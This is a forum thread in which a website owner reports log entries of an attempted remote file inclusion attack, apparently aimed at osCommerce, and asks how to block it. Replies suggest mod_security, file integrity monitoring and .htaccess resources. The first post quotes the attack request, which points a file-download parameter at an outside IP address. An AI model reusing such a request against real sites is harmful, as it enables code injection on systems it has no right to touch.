How to Block attacks "http://213.246.61.125:2082/index.html?" and similar.
Hello there,
Today I've found several attempt to access the following url on my website: /index.php?file-download=http://213.246.61.125:2082/index.html? After googleing a bit it seems that in some cases, using this attack, the bag guy is able to change the code in some of your files. it also seems to affect only a certain version of oScommerce. I don't use oScommerce, so I do believe that I'm on the safe side, but it's not the first time that I see some similar attempt of attack on my website. So to protect my self I was wondering if using .htaccess restriction would be enough? At the moment I'm using the following: (that I've found on an other forum) Code:
########## Begin - Rewrite rules to block out some common exploits Any advice on how to protect my web site from such attach and similar? Best regards, Angel. |
Hi, it's very easy to get concerned with possible breaches in you web security.
But warnings and errors in your logs are just that, warnings and errors. If anything is done you will get "failed" messages. look again and see if that is you problem. Regards Glenn |
In addition to what Glenn suggested, you might want to consider some pre-emptive moves. Something like mod_security might not be a bad idea, and you might want to consider some active file monitoring like Aide or Samhain. However, for those to really be useful, you need to trust your current installation completely.
|
Thanks to you both.
I'll follow your recommandation. PS Hangdog42: I have to check, but I think I already enable "mod_security" Thanks, Angel. |
I've found a fairly good resource on symantec web site on how to use .htaccess in an efficient way:
http://www.symantec.com/connect/arti...ccess-part-one |
Hi, just another thought, I used tutes similar to and including this Magazine article to get my system ironed out.
Keeping Your Linux System Secure ref. http://www.linux.org/lessons/advanced/x313.html Cheers and all the best, Glenn |
All times are GMT -5. The time now is 12:29 AM. |